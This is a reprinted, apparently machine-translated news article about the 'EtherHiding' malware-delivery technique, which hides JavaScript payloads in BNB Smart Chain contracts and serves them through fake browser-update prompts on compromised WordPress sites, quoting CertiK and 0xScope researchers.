Network security analysts from 0xScope and CertiK suggest that threat actors may prefer to use BNB smart chain contracts because they are cheaper and less secure than Ethereum.Network security analysts have revealed that although the name is "EtherHiding," the new attack vector hiding malicious code in blockchain smart contracts has little to do with Ethereum
Network security analysts from 0xScope and CertiK suggest that threat actors may prefer to use BNB smart chain contracts because they are cheaper and less secure than Ethereum.
Network security analysts have revealed that although the name is "EtherHiding," the new attack vector hiding malicious code in blockchain smart contracts has little to do with Ethereum.
According to Cointelgraph on October 16th, EtherHiding has been discovered as a new method for malicious actors to hide malicious loads in smart contracts, with the ultimate goal of distributing malicious software to unsuspecting victims.
It is understood that these cybercriminals often prefer to use the BNB smart chain of Coin Security.
Joe Green, a security researcher at blockchain security company CertiK, stated in an interview with Cointelgraph that this is mainly due to the lower cost of BNB smart chains.
The handling fees of BSC are much cheaper than ETH, but the network stability and speed are the same because every update of JavaScript Payload is very cheap, which means there is no financial pressure
The EtherHiding attack is initiated by hackers who disrupt the WordPress website and inject code to extract a portion of the payload buried in the Coin Security smart contract. The front-end of the website has been replaced by a fake update browser prompt, which will extract JavaScript payloads from the Coin Security blockchain when clicked
Attackers often alter the malware payload and update website domains to evade detection. Green explained that this allows them to continuously provide users with the latest malware downloads disguised as browser updates.
Another reason may be the strengthening of Ethereum security related reviews, according to security researchers at Web3 analytics company 0xScope.
Although we are unlikely to know the true motivation behind EtherHiding hackers using BNB smart chains instead of other blockchains in their plans, a possible factor is the strengthening of Ethereum security related censorship
They stated that due to systems such as Infura's MetaMask transaction IP address tracking, hackers using Ethereum to inject malicious code may face a higher risk of being discovered.
The 0xScope team told Cointelgraph that they have recently tracked the flow of funds between the BNB smart chain and hacker addresses on Ethereum.
According to reports, the key address is associated with OpenSea users and Copper hosting services in the NFT market.
The payload of 18 identified hacker domains is updated daily. The company concludes that this complexity makes EtherHiding difficult to detect and prevent.
Disclaimer: The content of this article is sourced from the internet. The copyright of the text, images, and other materials belongs to the original author. The platform reprints the materials for the purpose of conveying more information. The content of the article is for reference and learning only, and should not be used for commercial purposes. If it infringes on your legitimate rights and interests, please contact us promptly and we will handle it as soon as possible! We respect copyright and are committed to protecting it. Thank you for sharing.(Email:[email protected])
